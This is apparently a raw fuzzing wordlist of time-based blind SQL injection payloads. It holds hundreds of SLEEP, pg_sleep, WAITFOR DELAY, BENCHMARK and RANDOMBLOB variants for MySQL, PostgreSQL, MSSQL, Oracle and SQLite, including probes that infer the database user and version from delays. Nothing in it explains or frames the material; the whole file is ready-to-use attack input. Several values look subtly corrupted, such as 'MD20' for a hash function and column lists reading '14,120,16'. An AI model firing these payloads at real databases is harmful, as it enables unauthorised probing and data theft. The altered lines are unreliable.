1 RLIKE SLEEP(20)-- 1337
1 SELECT SLEEP(20); #
1 SELECT pg_sleep(20);
1 WAITFOR DELAY '0:0:20'
1 WAITFOR DELAY '0:0:20'--
1 WAITFOR DELAY '0:0:20'-- 1337
1 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
1 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
1 WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
1 and sleep 20
1 and sleep(20)
1 and sleep(20)--
1 or benchmark(10000000,MD20(1))#
1 or pg_sleep(20)--
1 or sleep(20)#
1' AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND '1337'='1337
1' WAITFOR DELAY '0:0:20' AND '1337'='1337
1'%2b(select*from(select(sleep(20)))a)%2b'
1') AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND ('1337'='1337
1') WAITFOR DELAY '0:0:20' AND ('1337'='1337
1'XOR(if(now()=sysdate(),sleep(20),0))OR'
1) AND 1337=(SELECT 1337 FROM PG_SLEEP(20)) AND (1337=1337
1) WAITFOR DELAY '0:0:20' AND (1337=1337
1) or benchmark(10000000,MD20(1))#
1) or pg_sleep(20)--
1) or sleep(20)#
1)) or benchmark(10000000,MD20(1))#
1)) or pg_sleep(20)--
1)) or sleep(20)#
1-IF(MID(VERSION(),1,1) = '20', SLEEP(120), 0)
1`=`1` AND ELT(1337=1337,SLEEP(20)) AND `1`=`1
; IF (ASCII(lower(substring((USER),3,1)))>1) WAITFOR DELAY '00:00:20'--
; IF (ASCII(lower(substring((USER),3,1)))>20) WAITFOR DELAY '00:00:20'--
; IF (ASCII(lower(substring((USER),20,1)))<10) WAITFOR DELAY '00:00:20'--
; IF (LEN(USER)=1) WAITFOR DELAY '00:00:20'--
; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:120'
; IF SYSTEM_USER='sa' WAIT FOR DELAY '00:00:20'
; WAIT FOR DELAY '00:00:120'
; WAIT FOR DELAY '00:00:20'
; WAITFOR DELAY '00:00:10';--
;SELECT SLEEP(20); #
;SELECT pg_sleep(20);
;WAITFOR DELAY '0:0:20'
;WAITFOR DELAY '0:0:20'--
;sleep 20
;sleep 20--
;sleep(20)
;sleep(20)--
;waitfor delay '0:0:20'--
=(select(0)from(select(sleep(20)))v)
=0'XOR(if(now()=sysdate(),sleep(20*1),0))XOR'Z
=1 AND (SELECT * FROM (SELECT(SLEEP(20)))YYYY) AND '%'='
=1 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
=1 or sleep(20)#
=1'XOR(if(now()=sysdate(),sleep(20),0))OR'
AND (SELECT * FROM (SELECT(SLEEP(20)))YjoC) AND '%'='
AND (SELECT * FROM (SELECT(SLEEP(20)))bAKL) AND 'vRxe'='vRxe
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)#
AND (SELECT * FROM (SELECT(SLEEP(20)))nQIP)--
AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)
AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
AND 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
AND LIKE SLEEP(20)--
AnD SLEEP(20)
AnD SLEEP(20)#
AnD SLEEP(20)--
BEGIN DBMS_LOCK.SLEEP(120); END;
BENCHMARK:You can replace AND / OR' AND 1337=BENCHMARK(20000000,MD20(0x774c20341))--
OR (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 1337=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(1000000000/2))))
OR 2947=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB(2000000000/2))))
OR LIKE SLEEP(20)--
ORDER BY 1,SLEEP(20)
ORDER BY 1,SLEEP(20)#
ORDER BY 1,SLEEP(20),3#
ORDER BY 1,SLEEP(20),3,4#
ORDER BY 1,SLEEP(20),3,4--
ORDER BY 1,SLEEP(20),3--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A'))
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29,30
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29,30#
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29,30--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18,19--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17,18--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16,17--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120,16--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14,120--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13,14--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12,13--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11,12--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10,11--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9,10--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8,9--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7,8--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6,7--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20,6--
ORDER BY 1,SLEEP(20),BENCHMARK(1000000,MD20('A')),4,20--
ORDER BY 1,SLEEP(20)--
ORDER BY SLEEP(20)
ORDER BY SLEEP(20)#
ORDER BY SLEEP(20)--
RANDOMBLOB(1000000000/2)
RANDOMBLOB(2000000000/2)
SLEEP(1)/*' or SLEEP(1) or '" or SLEEP(1) or "*/
SLEEP(20)#
SLEEP(20)--
SLEEP(20)="
SLEEP(20)='
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL,NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A')),NULL--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20),BENCHMARK(1000000,MD20('A'))--
UNION ALL SELECT @@VERSION,USER(),SLEEP(20)--
UNION ALL SELECT SLEEP(20)--
UNION ALL SELECT USER(),SLEEP(20)--
UNION SELECT @@VERSION,SLEEP(20),"'3
UNION SELECT @@VERSION,SLEEP(20),"'3'"#
UNION SELECT @@VERSION,SLEEP(20),3
UNION SELECT @@VERSION,SLEEP(20),USER(),4
UNION SELECT @@VERSION,SLEEP(20),USER(),4#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29#
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29,30
UNION SELECT @@VERSION,SLEEP(20),USER(),BENCHMARK(1000000,MD20('A')),20,6,7,8,9,10,11,12,13,14,120,16,17,18,19,20,21,22,23,24,220,26,27,28,29,30#
WAITFOR DELAY '0:0:20'
XOR(if(now()=sysdate(),sleep(20),0))OR'
]-(SELECT 0 WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY))|[1
]-(SELECT 0 WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20)))|[1
` WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
` WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
` WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
`) WHERE 1337=1337 AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY)-- 1337
`) WHERE 1337=1337 AND ELT(1337=1337,SLEEP(20))-- 1337
`) WHERE 1337=1337 RLIKE SLEEP(20)-- 1337
`=`1` AND (SELECT 1337 FROM (SELECT(SLEEP(20)))YYYY) AND `1`=`1
and 0=benchmark(3000000,MD20(1))%20%23
and 0=benchmark(3000000,MD20(1))%20--
and 0=benchmark(3000000,MD20(1))%20/*
and SELECT SLEEP(20); #
and SELECT pg_sleep(20);
and WAITFOR DELAY '0:0:20'
and WAITFOR DELAY '0:0:20'--
and sleep 20
and sleep 20--
and sleep(20)
and sleep(20)--
benchmark(10000000,MD20(1))#
benchmark(1000000000,md20(1))--
benchmark(200000000,MD20(1))
benchmark(200000000,MD20(1))#
benchmark(200000000,MD20(1))--
desc%2c(select*from(select(sleep(20)))a)
if(now()=sysdate(),sleep(3),0)/"XOR(if(now()=sysdate(),sleep(3),0))OR"/
